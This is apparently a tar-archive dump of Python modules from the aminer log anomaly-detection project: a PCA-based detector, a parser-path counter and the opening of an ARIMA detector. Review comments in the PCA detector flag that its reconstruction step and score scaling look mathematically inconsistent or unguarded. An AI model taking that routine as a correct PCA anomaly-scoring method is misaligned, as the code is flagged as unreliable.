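                event_data = {'AnalysisComponent': analysis_component}
                for listener in self.anomaly_event_handlers:
                    listener.receive_event(f'Analysis.{self.__class__.__name__}', 'New value(s) detected', sorted_log_lines, event_data,
                                           log_atom, self)
            # Counted once per target path that had a match.
            self.log_success += 1

    def do_timer(self, trigger_time):
        """
        Check if current ruleset should be persisted.

        @param trigger_time the time the timer was triggered with.
        @return the number of seconds until the next persistence is due. When no persistence time has been scheduled yet
                (next_persist_time is None), the configured persistence period is returned.
        """
        if self.next_persist_time is None:
            return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)

        delta = self.next_persist_time - trigger_time
        if delta <= 0:
            self.do_persist()
            delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
            # The next run is scheduled from the wall clock, not from trigger_time.
            self.next_persist_time = time.time() + delta
        return delta

    def do_persist(self):
        """Immediately write persistence data to storage."""
        PersistenceUtil.store_json(self.persistence_file_name, list(self.known_values_set))
        logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__)

    def allowlist_event(self, event_type, event_data, allowlisting_data):
        """
        Allowlist an event generated by this source using the information emitted when generating the event.

        @param event_type must be the event type emitted by this detector, i.e. 'Analysis.<class name>'.
        @param event_data the single value to add to the known values. NOTE(review): it is added as-is, so it only matches later
               log atoms when it has the same type as the parsed match_object (e.g. bytes, not str) -- confirm against the caller.
        @param allowlisting_data must be None; this detector does not understand additional allowlisting data.
        @return a message with information about allowlisting
        @throws Exception when allowlisting of this special event using given allowlisting_data was not possible.
        """
        if event_type != f'Analysis.{self.__class__.__name__}':
            msg = 'Event not from this source'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if allowlisting_data is not None:
            msg = 'Allowlisting data not understood by this detector'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        self.known_values_set.add(event_data)
        return f"Allowlisted path(es) {', '.join(self.target_path_list)} with {event_data}."

    def log_statistics(self, component_name):
        """
        Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler.

        All counters are reset after the report was written.
        @param component_name the name of the component which is printed in the log line.
        """
        if AminerConfig.STAT_LEVEL == 1:
            logging.getLogger(STAT_LOG_NAME).info(
                "'%s' processed %d out of %d log atoms successfully and learned %d new values in the last 60 minutes.",
                component_name, self.log_success, self.log_total, self.log_learned_path_values)
        elif AminerConfig.STAT_LEVEL == 2:
            # This detector learns single values, not combinations (wording copied from the combo detector before).
            logging.getLogger(STAT_LOG_NAME).info(
                "'%s' processed %d out of %d log atoms successfully and learned %d new values in the last 60 minutes."
                " Following new values were learned: %s", component_name, self.log_success, self.log_total,
                self.log_learned_path_values, self.log_new_learned_values)
        self.log_success = 0
        self.log_total = 0
        self.log_learned_path_values = 0
        self.log_new_learned_values = []
logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis/PCADetector.py000066400000000000000000000476021437606560100335100ustar00rootroot00000000000000"""
This module defines a PCA-detector for event and value counts.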
The component detects anomalies by creating an Event-Count-Matrix for given time-windows to calculate an anomaly score for new time windows
afterwards by using the reconstruction error from the inverse-transformation with restricted components of the Principal-Component-Analysis (PCA).

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
import copy
import numpy as np
import logging
import os
import time
from aminer import AminerConfig
from aminer.AminerConfig import DEBUG_LOG_NAME, STAT_LEVEL, STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX,\
    KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD
from aminer.AnalysisChild import AnalysisContext
from aminer.util import PersistenceUtil
from aminer.input.InputInterfaces import AtomHandlerInterface
from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface


class PCADetector(AtomHandlerInterface, TimeTriggeredComponentInterface):
    """
    This class creates events if event or value occurrence counts are outliers in PCA space.

    Log atoms are counted per time window (window_size seconds) into event_count_vector, a dict {path: {value: count}}. When a
    window closes, the vector is scored against the PCA of the last num_windows count vectors (event_count_matrix) and, in
    learn_mode, appended to that matrix. The event count matrix is what gets persisted.
    """

    time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME

    def __init__(self, aminer_config, target_path_list, anomaly_event_handlers, window_size, min_anomaly_score, min_variance, num_windows,
                 persistence_id='Default', learn_mode=False, output_logline=True, ignore_list=None, constraint_list=None, stop_learning_time=None,
                 stop_learning_no_anomaly_time=None):
        """
        Initialize the detector. This will also trigger reading or creation of persistence storage location.
        @param aminer_config configuration from analysis_context.
        @param target_path_list parser paths of values to be analyzed. Multiple paths mean that values are analyzed as separate
               dimensions. When no paths are specified, the events given by the full path list are analyzed (one dimension).
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
        @param window_size the length of the time window for counting in seconds.
        @param min_anomaly_score the minimum computed outlier score for reporting anomalies. Scores are scaled by training data, i.e.,
               reasonable minimum scores are >1 to detect outliers with respect to currently trained PCA matrix.
        @param min_variance the minimum variance covered by the principal components in range [0, 1].
        @param num_windows the number of time windows in the sliding window approach. Total covered time span = window_size * num_windows.
               Values below 3 are raised to 3 with a warning (see below).
        @param persistence_id name of persistence file.
        @param learn_mode specifies whether new count measurements are added to the PCA count matrix.
        @param output_logline specifies whether the full parsed log atom should be provided in the output.
        @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted.
               The default value is [] as None is not iterable.
        @param constraint_list list of paths that have to be present in the log atom to be analyzed.
        @param stop_learning_time switch the learn_mode to False after the time.
        @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time.
        """
        # avoid "defined outside init" issue; the base class initializes these from the arguments.
        self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5
        super().__init__(
            mutable_default_args=["ignore_list", "constraint_list"], aminer_config=aminer_config, target_path_list=target_path_list,
            anomaly_event_handlers=anomaly_event_handlers, window_size=window_size, min_anomaly_score=min_anomaly_score,
            min_variance=min_variance, num_windows=num_windows, persistence_id=persistence_id, learn_mode=learn_mode,
            output_logline=output_logline, ignore_list=ignore_list, constraint_list=constraint_list, stop_learning_time=stop_learning_time,
            stop_learning_no_anomaly_time=stop_learning_no_anomaly_time
        )
        # skipcq: PYL-W0511
        # ToDo: an exception should be thrown instead of this check.
        # At least 3 count vectors are required before a PCA is computed (see receive_atom), so fewer windows would never score.
        if num_windows < 3:
            logging.getLogger(AminerConfig.DEBUG_LOG_NAME).warning('num_windows must be >= 3!')
            self.num_windows = 3
        else:
            self.num_windows = num_windows
        # True until the first atom fixes start_time, the beginning of the first time window.
        self.first_log = True
        self.start_time = 0
        # List of per-window count dicts (the "event count matrix"); at most num_windows entries are kept.
        self.event_count_matrix = []
        # Flat list of the features (dict keys) present in event_count_matrix[0]; defines the column order of ecm.
        self.feature_list = []
        # numpy array form of event_count_matrix, rebuilt by compute_pca().
        self.ecm = None
        # Number of closed time windows since the last statistics report.
        self.log_windows = 0
        self.pca_ecm = None
        self.eigen_vectors = None
        # number of components (n_comp): how many components should be used for reconstruction
        self.n_comp = None
        # Calculate Anomaly-Score (Reconstruction Error) for the whole dataset
        self.loss = None
        self.persistence_file_name = AminerConfig.build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id)
        PersistenceUtil.add_persistable_component(self)
        persistence_data = PersistenceUtil.load_json(self.persistence_file_name)
        if persistence_data is not None:
            # NOTE(review): the persisted matrix is used as-is; compute_pca() needs at least one entry (event_count_matrix[0]) and
            # the PCA itself needs >= 3 rows, so a truncated or tampered persistence file fails here rather than being validated.
            self.event_count_matrix = list(persistence_data)
            self.compute_pca()
            # Copy feature list into event count vector and reset counts of each feature
            self.event_count_vector = copy.deepcopy(self.event_count_matrix[0])
            self.reset_event_count_vector()
        else:
            if self.target_path_list is None or len(self.target_path_list) == 0:
                # Only one dimension when events are used instead of values; use empty string as placeholder
                self.event_count_vector = {'': {}}
            else:
                self.event_count_vector = {}

    def receive_atom(self, log_atom):
        """
        Receive parsed atom and the information about the parser match.

        Closes every time window that ended before the atom's timestamp (scoring and, in learn_mode, learning each one), then counts
        the atom into the current window: either by its full path tuple (no target_path_list) or by the values at target_path_list.
        """
        parser_match = log_atom.parser_match
        self.log_total += 1
        if self.learn_mode is True and self.stop_learning_timestamp is not None and \
                self.stop_learning_timestamp < log_atom.atom_time:
            logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__)
            self.learn_mode = False

        # Skip paths from ignore list.
        for ignore_path in self.ignore_list:
            if ignore_path in parser_match.get_match_dictionary().keys():
                return

        # get the timestamp of the first log to start the time-window-process (flag)
        if self.first_log:
            self.start_time = log_atom.get_timestamp()
            self.first_log = False

        current_time = log_atom.get_timestamp()
        # A large gap in the log closes several windows at once; each of them is scored (and reported with this same atom).
        while current_time >= (self.start_time + self.window_size):
            # PCA computation only possible when at least 3 vectors are present
            if len(self.event_count_matrix) >= 3:
                anomaly_score = self.anomaly_score()
                if anomaly_score > self.min_anomaly_score:
                    try:
                        data = log_atom.raw_data.decode(AminerConfig.ENCODING)
                    except UnicodeError:
                        data = repr(log_atom.raw_data)
                    if self.output_logline:
                        original_log_line_prefix = self.aminer_config.config_properties.get(
                            CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX)
                        sorted_log_lines = [log_atom.parser_match.match_element.annotate_match('') + os.linesep + original_log_line_prefix + data]
                    else:
                        sorted_log_lines = [data]
                    # Report the complete count vector of the closed window, not only the outlying features.
                    affected_paths = []
                    affected_values = []
                    affected_counts = []
                    for path, count_dict in self.event_count_vector.items():
                        affected_paths.append(path)
                        affected_values.append(list(count_dict.keys()))
                        affected_counts.append(list(count_dict.values()))
                    analysis_component = {'AffectedLogAtomPaths': affected_paths, 'AffectedLogAtomValues': affected_values,
                                          'AffectedValueCounts': affected_counts, 'AnomalyScore': anomaly_score[0]}
                    event_data = {'AnalysisComponent': analysis_component}
                    for listener in self.anomaly_event_handlers:
                        listener.receive_event(f'Analysis.{self.__class__.__name__}', 'PCA anomaly detected', sorted_log_lines, event_data,
                                               log_atom, self)
            self.log_windows += 1

            # Add new values to matrix in learn mode
            if self.learn_mode is True:
                # Sliding window: drop the oldest count vector once num_windows are stored.
                if len(self.event_count_matrix) >= self.num_windows:
                    del self.event_count_matrix[0]
                self.event_count_matrix.append(copy.deepcopy(self.event_count_vector))
                # PCA computation only possible when at least 3 vectors are present
                if len(self.event_count_matrix) >= 3:
                    self.repair_dict()
                    self.compute_pca()
                if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None:
                    self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time

            # Set window end time for next iteration
            self.start_time += self.window_size
            # Reset count vector for next time window
            self.reset_event_count_vector()

        if self.target_path_list is None or len(self.target_path_list) == 0:
            # Event is defined by the full path of log atom.
            constraint_path_flag = False
            for constraint_path in self.constraint_list:
                if parser_match.get_match_dictionary().get(constraint_path) is not None:
                    constraint_path_flag = True
                    break
            if not constraint_path_flag and self.constraint_list != []:
                return
            log_event = tuple(parser_match.get_match_dictionary().keys())
            if log_event in self.event_count_vector['']:
                self.event_count_vector[''][log_event] += 1
            else:
                self.event_count_vector[''][log_event] = 1
        else:
            # Event is defined by values in target_path_list
            all_values_none = True
            for path in self.target_path_list:
                match = parser_match.get_match_dictionary().get(path)
                if match is None:
                    continue
                matches = []
                if isinstance(match, list):
                    matches = match
                else:
                    matches.append(match)
                for match in matches:
                    if isinstance(match.match_object, bytes):
                        value = match.match_object.decode(AminerConfig.ENCODING)
                    else:
                        value = str(match.match_object)
                    # value is always a str here, so this flag records "at least one path matched".
                    if value is not None:
                        all_values_none = False
                    if path in self.event_count_vector:
                        if value in self.event_count_vector[path]:
                            self.event_count_vector[path][value] += 1
                        else:
                            self.event_count_vector[path][value] = 1
                    else:
                        self.event_count_vector[path] = {value: 1}
            if all_values_none is True:
                return
        self.log_success += 1

    def compute_pca(self):
        """
        Carry out PCA on current event count matrix.

        Sets feature_list, ecm, pca_ecm, eigen_vectors, n_comp and loss (the per-row reconstruction error of the training data,
        used by anomaly_score() for min/max scaling). Requires event_count_matrix to be non-empty with consistent keys
        (see repair_dict()).
        """
        # extract the features out of ecm into a list
        self.feature_list = []
        for events in self.event_count_matrix[0].values():
            for feature in events:
                self.feature_list.append(feature)
        # extract existing event_counts into array
        matrix = []
        for event_count in self.event_count_matrix:
            row = []
            for event in event_count.values():
                row += list(event.values())
            matrix.append(row)
        self.ecm = np.array(matrix)
        # Principal Component Analysis (PCA)
        # NOTE(review): a single global mean/std is used (not per feature); std() of an all-equal matrix is 0 and yields nan here.
        normalized_ecm = (self.ecm - self.ecm.mean()) / self.ecm.std()
        covariance_matrix = np.cov(normalized_ecm.T)
        # np.linalg.eigh returns eigenvalues in ascending order with eigenvectors as columns.
        eigen_values, eigen_vectors = np.linalg.eigh(covariance_matrix)
        self.pca_ecm = normalized_ecm @ eigen_vectors
        self.eigen_vectors = eigen_vectors
        # number of components (n_comp): how many components should be used for reconstruction
        self.n_comp = self.get_n_comp(eigen_values)
        # PCA Inverse with only these components which describes the min_variance
        # NOTE(review): get_n_comp() counts components from the largest eigenvalue downwards, but the slices below take the first
        # n_comp columns/rows of the ascending eigh() result (the smallest-variance directions) and use rows of eigen_vectors instead
        # of the transposed column block. This looks inconsistent with a standard PCA reconstruction -- verify against the
        # intended algorithm before relying on the absolute score values.
        pca_inverse = self.pca_ecm[:, :self.n_comp] @ eigen_vectors[:self.n_comp, :]
        # Calculate Anomaly-Score (Reconstruction Error) for the whole dataset
        self.loss = np.sum((normalized_ecm - pca_inverse)**2, axis=1)

    def anomaly_score(self):
        """
        Calculate the anomalyscore for current event_count_vector.

        @return a one-element numpy array holding the reconstruction error of the current count vector, scaled so that the
                training rows' errors span [0, 1] (values > 1 are therefore worse than anything in the training data).
        """
        # convert the event_count_vector into an array
        ecv = self.vector2array()
        # normalize the ecv with the mean and std of learned ecm
        normalized_ecv = (ecv - self.ecm.mean()) / self.ecm.std()
        # reshape array into a 1-dimensional array
        normalized_ecv = normalized_ecv.reshape(1, -1)
        # calculate the reduced pca for current log-sequence with given eigen_vectors
        pca_ecv = normalized_ecv @ self.eigen_vectors
        # calculate the pca_inverse with reduced number of components / do reconstruction
        pca_inverse_ecv = pca_ecv[:, :self.n_comp] @ self.eigen_vectors[:self.n_comp, :]
        # calculate the reconstruction error / anomaly score
        loss = np.sum((normalized_ecv - pca_inverse_ecv)**2, axis=1)
        # scale the reconstruction error with the min, max of ecm-loss
        # NOTE(review): when all training losses are equal the denominator is 0 and numpy produces inf/nan (with a warning)
        # instead of raising; an inf score is reported as an anomaly, a nan score is silently never reported.
        loss = (loss - np.min(self.loss)) / (np.max(self.loss) - np.min(self.loss))
        return loss

    def vector2array(self):
        """
        Extract only the values which were learned before from current self.event_count_vector and return an array.

        Features not present in feature_list (values first seen in the current window) are dropped so the array matches the
        column layout of ecm.
        """
        vector = []
        for event in self.event_count_vector.values():
            for feature, value in event.items():
                if feature in self.feature_list:
                    vector.append(value)
        return np.array(vector)

    def get_n_comp(self, eigen_values):
        """
        Return the number of components, which describe the variance threshold.

        @param eigen_values eigenvalues in ascending order as returned by np.linalg.eigh; they are traversed in reverse so the
               largest contributions are accumulated first.
        @return the smallest n such that the n largest components explain more than min_variance of the total variance, or None
                when the threshold is never exceeded (a slice [:None] then uses all components).
        """
        # Calculate the explained variance on each of components
        variance_explained = []
        for i in eigen_values[::-1]:
            variance_explained.append((i/sum(eigen_values))*100)
        # Calculate the cumulative explained variance (np.cumsum)
        cumulative_variance_explained = np.cumsum(variance_explained)
        for n, i in enumerate(cumulative_variance_explained):
            if i > (self.min_variance * 100):
                return n
        return None

    def repair_dict(self):
        """
        Check if any new values were added in current event_count_vector and repair self.event_count_matrix when necessary.

        Every stored count vector is extended in place with the paths/values it lacks (count 0), so that all rows share the key
        layout of event_count_vector before compute_pca() flattens them.
        """
        for ecv in self.event_count_matrix:
            for key, value in self.event_count_vector.items():
                if key not in ecv.keys():
                    # Only the last value survives this loop; the missing ones are filled in by the check below.
                    # NOTE(review): if value were an empty dict, ecv[key] would not be created and the next line would raise KeyError.
                    for val in value:
                        ecv[key] = {val: 0}
                if not self.event_count_vector[key].keys() == ecv[key].keys():
                    for k in self.event_count_vector[key].keys():
                        if k not in ecv[key].keys():
                            ecv[key][k] = 0

    def reset_event_count_vector(self):
        """Reset event_count_vector by setting all count-values to 0 (the keys are kept so the feature layout survives)."""
        for events in self.event_count_vector.values():
            for value in events:
                events[value] = 0

    def do_timer(self, trigger_time):
        """
        Check if current ruleset should be persisted.

        @param trigger_time the time the timer was triggered with.
        @return the number of seconds until the next persistence is due. When no persistence time has been scheduled yet
                (next_persist_time is None), the configured persistence period is returned.
        """
        if self.next_persist_time is None:
            return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)

        delta = self.next_persist_time - trigger_time
        if delta <= 0:
            self.do_persist()
            delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
            # The next run is scheduled from the wall clock, not from trigger_time.
            self.next_persist_time = time.time() + delta
        return delta

    def do_persist(self):
        """Immediately write persistence data to storage. Nothing is written outside learn_mode, as the matrix cannot change then."""
        if self.learn_mode is True:
            PersistenceUtil.store_json(self.persistence_file_name, list(self.event_count_matrix))

    def allowlist_event(self, event_type, event_data, allowlisting_data):
        """
        Allowlist an event generated by this source using the information emitted when generating the event.

        For this detector allowlisting means adding event_data to constraint_list, i.e. only atoms containing that path are
        analyzed from now on (events-mode only, see receive_atom).
        @param event_type must be the event type emitted by this detector, i.e. 'Analysis.<class name>'.
        @param event_data the parser path to add to constraint_list. NOTE(review): not validated to be a path string.
        @param allowlisting_data must be None; this detector does not understand additional allowlisting data.
        @return a message with information about allowlisting
        @throws Exception when allowlisting of this special event using given allowlisting_data was not possible.
        """
        if event_type != f'Analysis.{self.__class__.__name__}':
            msg = 'Event not from this source'
            logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if allowlisting_data is not None:
            msg = 'Allowlisting data not understood by this detector'
            logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if event_data not in self.constraint_list:
            self.constraint_list.append(event_data)
        return f'Allowlisted path {event_data}.'

    def blocklist_event(self, event_type, event_data, blocklisting_data):
        """
        Blocklist an event generated by this source using the information emitted when generating the event.

        For this detector blocklisting means adding event_data to ignore_list, i.e. atoms containing that path are skipped.
        @param event_type must be the event type emitted by this detector, i.e. 'Analysis.<class name>'.
        @param event_data the parser path to add to ignore_list. NOTE(review): not validated to be a path string.
        @param blocklisting_data must be None; this detector does not understand additional blocklisting data.
        @return a message with information about blocklisting
        @throws Exception when blocklisting of this special event using given blocklisting_data was not possible.
        """
        if event_type != f'Analysis.{self.__class__.__name__}':
            msg = 'Event not from this source'
            logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if blocklisting_data is not None:
            msg = 'Blocklisting data not understood by this detector'
            logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if event_data not in self.ignore_list:
            self.ignore_list.append(event_data)
        return f'Blocklisted path {event_data}.'

    def log_statistics(self, component_name):
        """
        Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler.

        Both STAT_LEVEL values currently emit the same line. All counters are reset after the report was written.
        @param component_name the name of the component which is printed in the log line.
        """
        if STAT_LEVEL == 1:
            logging.getLogger(STAT_LOG_NAME).info(
                "'%s' processed %d out of %d log atoms successfully in %d time windows in the last 60 minutes.", component_name,
                self.log_success, self.log_total, self.log_windows)
        elif STAT_LEVEL == 2:
            logging.getLogger(STAT_LOG_NAME).info(
                "'%s' processed %d out of %d log atoms successfully in %d time windows in the last 60 minutes.", component_name,
                self.log_success, self.log_total, self.log_windows)
        self.log_success = 0
        self.log_total = 0
        self.log_windows = 0
logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis/ParserCount.py000066400000000000000000000157161437606560100336610ustar00rootroot00000000000000"""
This component counts occurring combinations of values and periodically sends the results as a report.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
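You should have received a copy of the GNU General Public License along with this program. If not, see .
"""

import time
import logging
from aminer.AminerConfig import DEBUG_LOG_NAME
from aminer.AnalysisChild import AnalysisContext
from aminer.input.InputInterfaces import AtomHandlerInterface
from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface

# Keys of the per-path counter dictionaries kept in ParserCount.count_dict.
current_processed_lines_str = 'CurrentProcessedLines'
total_processed_lines_str = 'TotalProcessedLines'


class ParserCount(AtomHandlerInterface, TimeTriggeredComponentInterface):
    """
    Count how often the configured parser paths occur in the received log atoms.

    For every target path (or its label) two counters are kept: the number of atoms seen since the last report and the
    number of atoms seen since start-up. The counters are emitted periodically as a 'Count report' event.
    """

    time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME

    def __init__(self, aminer_config, target_path_list, anomaly_event_handlers, report_interval=60, target_label_list=None,
                 split_reports_flag=False):
        """
        Initialize the ParserCount component.
        @param aminer_config configuration from analysis_context.
        @param target_path_list parser paths whose occurrences are counted. Every path gets its own pair of counters. If the
               list is empty, the first path of each atom's match dictionary is counted instead.
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
        @param report_interval delay in seconds between two reports.
        @param target_label_list optional labels used instead of the paths as counter names. The list must have the same
               size as target_path_list.
        @param split_reports_flag if true every path produces its own report, otherwise one report for all paths is produced.
        @raise ValueError if labels are given without paths or the label and path lists differ in length.
        """
        # avoid "defined outside init" issue; the base class is expected to set the actual counters.
        self.log_success, self.log_total = [None] * 2
        super().__init__(
            mutable_default_args=["target_path_list"], aminer_config=aminer_config, target_path_list=target_path_list,
            anomaly_event_handlers=anomaly_event_handlers, report_interval=report_interval, target_label_list=target_label_list,
            split_reports_flag=split_reports_flag
        )
        # counter name (path or label) -> {current_processed_lines_str: int, total_processed_lines_str: int}
        self.count_dict = {}
        # Set on the first received atom, so the first report covers a full interval of actual input.
        self.next_report_time = None

        if not self.target_path_list and self.target_label_list:
            msg = 'Target labels cannot be used without specifying target paths.'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if self.target_label_list is not None and len(self.target_path_list) != len(self.target_label_list):
            msg = 'Every path must have a target label if target labels are used.'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)

        for target_path in self.target_path_list:
            self.count_dict[self._counter_name(target_path)] = self._new_counter()

    def _counter_name(self, target_path):
        """Return the label configured for target_path, or the path itself when no labels are used."""
        if self.target_label_list:
            return self.target_label_list[self.target_path_list.index(target_path)]
        return target_path

    @staticmethod
    def _new_counter():
        """Return a fresh pair of counters (per interval and total), both at zero."""
        return {current_processed_lines_str: 0, total_processed_lines_str: 0}

    def _count(self, name):
        """Increment both counters of name, creating the pair on first use."""
        counters = self.count_dict.setdefault(name, self._new_counter())
        counters[current_processed_lines_str] += 1
        counters[total_processed_lines_str] += 1

    def receive_atom(self, log_atom):
        """
        Count the target paths contained in a log atom.
        @param log_atom the parsed log atom.
        @return True; the atom is always consumed.
        """
        self.log_total += 1
        match_dict = log_atom.parser_match.get_match_dictionary()
        success_flag = False
        for target_path in self.target_path_list:
            if match_dict.get(target_path) is not None:
                success_flag = True
                self._count(self._counter_name(target_path))
        if not self.target_path_list:
            # No paths configured: count the first path of the match dictionary. An atom without any match must not
            # let StopIteration escape from the handler, so such an atom is skipped instead.
            path = next(iter(match_dict), None)
            if path is not None:
                self._count(path)
        if self.next_report_time is None:
            self.next_report_time = time.time() + self.report_interval
        if success_flag:
            self.log_success += 1
        return True

    def do_timer(self, trigger_time):
        """
        Send the report once the report interval has elapsed.
        @param trigger_time the time at which the timer fired.
        @return the number of seconds until this method should be called again.
        """
        if self.next_report_time is None:
            return self.report_interval
        delta = self.next_report_time - trigger_time
        if delta <= 0:
            self.send_report()
            delta = self.report_interval
            self.next_report_time = time.time() + delta
        return delta

    # skipcq: PYL-R0201
    def do_persist(self):
        """Nothing to persist: the counters live only in memory, so no persistence file is written."""
        return False

    def send_report(self):
        """
        Emit the counters as 'Count report' event(s) and reset the per-interval counters.

        The StatusInfo handed to the listeners is a copy of the counters: the per-interval values are reset right after
        the report, and a listener that keeps the event data (or serializes it later) must not observe that reset.
        """
        event_type = f'Analysis.{self.__class__.__name__}'
        report_time = time.time()
        header = f'Parsed paths in the last {self.report_interval} seconds:'
        if not self.split_reports_flag:
            lines = [f'\t{name}: {counters}' for name, counters in self.count_dict.items()]
            status_info = {name: dict(counters) for name, counters in self.count_dict.items()}
            self._emit(event_type, '\n'.join([header] + lines), status_info, report_time)
        else:
            for name, counters in self.count_dict.items():
                self._emit(event_type, f'{header}\n\t{name}: {counters}', {name: dict(counters)}, report_time)
        for counters in self.count_dict.values():
            counters[current_processed_lines_str] = 0
        logging.getLogger(DEBUG_LOG_NAME).debug("%s sent report.", self.__class__.__name__)

    def _emit(self, event_type, output_string, status_info, report_time):
        """Deliver one report to all anomaly_event_handlers; the covered interval ends at report_time."""
        event_data = {'StatusInfo': status_info, 'FromTime': report_time - self.report_interval, 'ToTime': report_time}
        for listener in self.anomaly_event_handlers:
            listener.receive_event(event_type, 'Count report', [output_string], event_data, None, self)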
PathArimaDetector.py000066400000000000000000000664121437606560100346760ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This module is a detector which uses a tsa-arima model to analyze the values of the paths in target_path_list. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import time import os import logging import numpy as np import sys import statsmodels import statsmodels.api as sm from scipy.stats import binom_test from aminer import AminerConfig from aminer.AminerConfig import KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, DEBUG_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX,\ DEFAULT_LOG_LINE_PREFIX from aminer.AnalysisChild import AnalysisContext from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface from aminer.util import PersistenceUtil class PathArimaDetector(AtomHandlerInterface, TimeTriggeredComponentInterface): """This class is used for an arima time series analysis of the values of the paths in target_path_list.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, event_type_detector, persistence_id='Default', target_path_list=None, output_logline=True, learn_mode=False, num_init=50, force_period_length=False, set_period_length=10, alpha=0.05, alpha_bt=0.05, num_results_bt=15, 
num_min_time_history=20, num_max_time_history=30, num_periods_tsa_ini=20, stop_learning_time=None, stop_learning_no_anomaly_time=None): """ Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param event_type_detector used to track the number of events in the time windows. @param persistence_id name of persistence file. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param learn_mode specifies whether new frequency measurements override ground truth frequencies. @param num_init number of lines processed before the period length is calculated. @param force_period_length states if the period length is calculated through the ACF, or if the period length is forced to be set to set_period_length. @param set_period_length states how long the period length is if force_period_length is set to True. @param alpha significance level of the estimated values. @param alpha_bt significance level for the bt test. @param num_results_bt number of results which are used in the binomial test. @param num_min_time_history number of lines processed before the period length is calculated. @param num_max_time_history maximum number of values of the time_history. @param num_periods_tsa_ini number of periods used to initialize the Arima-model. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. 
